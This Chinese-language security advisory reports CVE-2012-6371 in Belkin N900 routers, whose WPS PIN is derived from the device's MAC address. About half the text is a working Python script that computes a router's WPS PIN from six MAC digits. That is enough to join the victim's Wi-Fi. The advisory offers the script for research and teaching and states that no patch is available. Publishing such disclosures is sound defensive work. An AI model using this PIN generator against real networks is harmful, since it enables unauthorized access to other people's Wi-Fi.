发布日期:2013-01-03
更新日期:2013-01-06
受影响系统:
Belkin Wireless Router Belkin N900 F9K1104v1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57128
CVE(CAN) ID: CVE-2012-6371
Belkin Wireless Routers是美国贝尔金公司的无线路由器产品。
Belkin N900 F9K1104v1及其他版本在WPA2的实现上,用基于6位数字的LAN/WLAN MAC地址建立了WPS PIN,通过读取广播报文,远程攻击者可利用此漏洞访问Wi-Fi网络。
<*来源:ZhaoChunsheng (e.novellalorente@student.ru.nl)
链接:?p=1295
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
@author : e.novellalorente@student.ru.nl
Original work : ZhaoChunsheng 04/07/2012
'''
import sys
VERSION = 0
SUBVERSION = 2
def usage():
print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
print "[*] Usage : python WPSpin.py 123456"
sys.exit(0)
def wps_pin_checksum(pin):
accum = 0
while(pin):
accum += 3 * (pin % 10)
pin /= 10
accum += pin % 10
pin /= 10
return (10 - accum % 10) % 10
try:
if (len(sys.argv[1]) == 6):
p = int(sys.argv[1] , 16) % 10000000
print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
else:
usage()
except Exception:
usage()
建议:
--------------------------------------------------------------------------------
厂商补丁:
Belkin
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
